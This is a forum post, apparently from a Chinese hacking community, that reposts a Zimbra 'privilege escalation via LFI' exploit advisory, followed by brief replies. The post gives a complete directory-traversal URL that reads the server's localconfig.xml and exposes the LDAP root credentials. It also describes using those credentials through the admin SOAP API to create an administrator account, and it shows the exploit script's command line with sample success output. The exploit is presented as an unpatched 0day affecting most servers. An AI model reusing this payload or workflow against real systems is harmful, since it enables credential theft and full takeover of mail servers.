查看: 16656|回复: 9

Zimbra – 0day exploit / Privilegie escalation via LFI

[复制链接]
发表于 2014-1-26 11:24:56 | 显示全部楼层 |阅读模式
screen-shot-2013-12-07-at-102906-am1.png
[AppleScript] 纯文本查看 复制代码
# Exploit Title: Zimbra 0day exploit / Privilegie escalation via LFI
# Date: 06 Dec 2013
# Exploit Author: rubina119
# Contact Email : rubina119[at]gmail.com
# Vendor Homepage: [url]http://www.zimbra.com/[/url]
# Version: 2009, 2010, 2011, 2012 and early 2013 versions are afected,
# Tested on: Centos(x), Ubuntu.
# CVE : No CVE, no patch just 0Day
# State : Critical
 
# Mirror: [url]http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip[/url]
 
---------------Description-----------------
 
This script exploits a Local File Inclusion in
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz
which allows us to see localconfig.xml
that contains LDAP root credentials wich allow us to make requests in
/service/admin/soap API with the stolen LDAP credentials to create user
with administration privlegies
and gain acces to the Administration Console.
 
LFI is located at :
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
 
Example :
 
[url]http://mail.example.com/res/I18nMsg[/url],AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
 
or
 
[url]http://mail.example.com:7071/zimbraAdmin/res/I18nMsg[/url],AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
 
----------------Exploit-----------------
 
Before use this exploit, target server must have admin console port open
"7071" otherwise it won't work.
 
use the exploit like this :
 
ruby run.rb -t mail.example.com -u someuser -p Test123_23
 
[*] Looking if host is vuln....
[+] Host is vuln exploiting...
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges
[+] Login Credentials
[*] Login URL : [url]http://mail.example.com:7071/zimbraAdmin/[/url]
[*] Account : [email]someuser@example.com[/email]
[*] Password : Test123_23
[+] Successfully Exploited !
 
The number of servers vuln are huge like 80/100.
 
This is only for educational purpouses.

游客,如果您要查看本帖隐藏内容请回复

评分

参与人数 1i币 +4 收起 理由
Diana + 4 的确是这样的。

查看全部评分

回复

使用道具 举报

发表于 2014-1-26 11:35:27 | 显示全部楼层
我是沙发
回复 支持 反对

使用道具 举报

发表于 2014-1-26 11:54:11 | 显示全部楼层
不错,看看。。。
回复 支持 反对

使用道具 举报

发表于 2014-1-26 11:55:34 | 显示全部楼层
LFI,直接爆出的password
回复 支持 反对

使用道具 举报

发表于 2014-1-26 12:04:29 | 显示全部楼层
看看,研究一下
回复 支持 反对

使用道具 举报

发表于 2014-1-26 14:11:21 | 显示全部楼层
就知道是这样滴~
回复 支持 反对

使用道具 举报

发表于 2014-1-26 17:26:50 | 显示全部楼层
赶紧看下
回复 支持 反对

使用道具 举报

发表于 2014-1-26 20:54:32 | 显示全部楼层
不错,看看
回复 支持 反对

使用道具 举报

发表于 2014-1-27 07:36:59 | 显示全部楼层
回复 支持 反对

使用道具 举报

发表于 2014-1-27 11:27:11 | 显示全部楼层
学习了,谢谢楼主分享
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-3-7 05:13 , Processed in 0.036996 second(s), 14 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部